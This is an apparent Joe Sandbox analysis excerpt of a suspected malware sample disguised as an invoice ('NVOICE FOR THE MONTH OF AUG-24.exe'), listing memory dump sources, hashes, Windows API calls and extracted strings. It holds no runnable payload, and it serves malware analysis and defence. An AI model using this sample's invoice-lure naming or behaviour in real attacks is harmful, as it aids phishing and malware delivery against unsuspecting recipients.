                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                          • String ID:
                                                          • API String ID: 262282135-0
                                                          • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                          • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                          • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                          • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                          APIs
                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                          • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                          • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                          • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                          • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$LongWindow
                                                          • String ID:
                                                          • API String ID: 312131281-0
                                                          • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                          • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                          • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                          • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                          APIs
                                                            • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                          • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                                                          • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                                                            • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                          • String ID:
                                                          • API String ID: 3771399671-0
                                                          • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                          • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                          • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                          • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                          • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                          • String ID:
                                                          • API String ID: 2156557900-0
                                                          • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                          • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                          • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                          • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                          • API String ID: 0-1603158881
                                                          • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                          • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                          • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                          • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                          APIs
                                                          • CreateMenu.USER32 ref: 00448603
                                                          • SetMenu.USER32(?,00000000), ref: 00448613
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                          • IsMenu.USER32(?), ref: 004486AB
                                                          • CreatePopupMenu.USER32 ref: 004486B5
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                          • DrawMenuBar.USER32 ref: 004486F5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                          • String ID: 0
                                                          • API String ID: 161812096-4108050209
                                                          • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                          • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                          • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                          • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe), ref: 00434057
                                                          • LoadStringW.USER32(00000000), ref: 00434060
                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                          • LoadStringW.USER32(00000000), ref: 00434078
                                                          • _wprintf.LIBCMT ref: 004340A1
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                          Strings
                                                          • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                          • C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe, xrefs: 00434040
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                          • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe
                                                          • API String ID: 3648134473-3607924507
                                                          • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                          • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                          • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                          • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                          • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                          • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                          • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                          APIs
                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe,0040F545,C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe,004A90E8,C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe,?,0040F545), ref: 0041013C
                                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                          • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                          • String ID:
                                                          • API String ID: 978794511-0
                                                          • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                          • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                          • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                          • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                          • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                          • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                          • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID:
                                                          • API String ID: 1473721057-0
                                                          • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                          • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                          • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                          • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _memmove$_memcmp
                                                          • String ID: '$\$h
                                                          • API String ID: 2205784470-1303700344
                                                          • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                          • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                          • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                          • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                          APIs
                                                          • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                          • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                          • VariantClear.OLEAUT32 ref: 0045EA6D
                                                          • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                          • __swprintf.LIBCMT ref: 0045EC33
                                                          • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                          Strings
                                                          • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                          • String ID: %4d%02d%02d%02d%02d%02d
                                                          • API String ID: 2441338619-1568723262
                                                          • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                          • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                          • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                          • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                          • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Interlocked$DecrementIncrement$Sleep
                                                          • String ID: @COM_EVENTOBJ
                                                          • API String ID: 327565842-2228938565
                                                          • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                          • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                          • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                          • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                          APIs
                                                          • VariantClear.OLEAUT32(?), ref: 0047031B
                                                          • VariantClear.OLEAUT32(?), ref: 0047044F
                                                          • VariantInit.OLEAUT32(?), ref: 004704A3
                                                          • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                          • VariantClear.OLEAUT32(?), ref: 00470516
                                                            • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                          • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                            • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                          • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                          • String ID: H
                                                          • API String ID: 3613100350-2852464175
                                                          • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
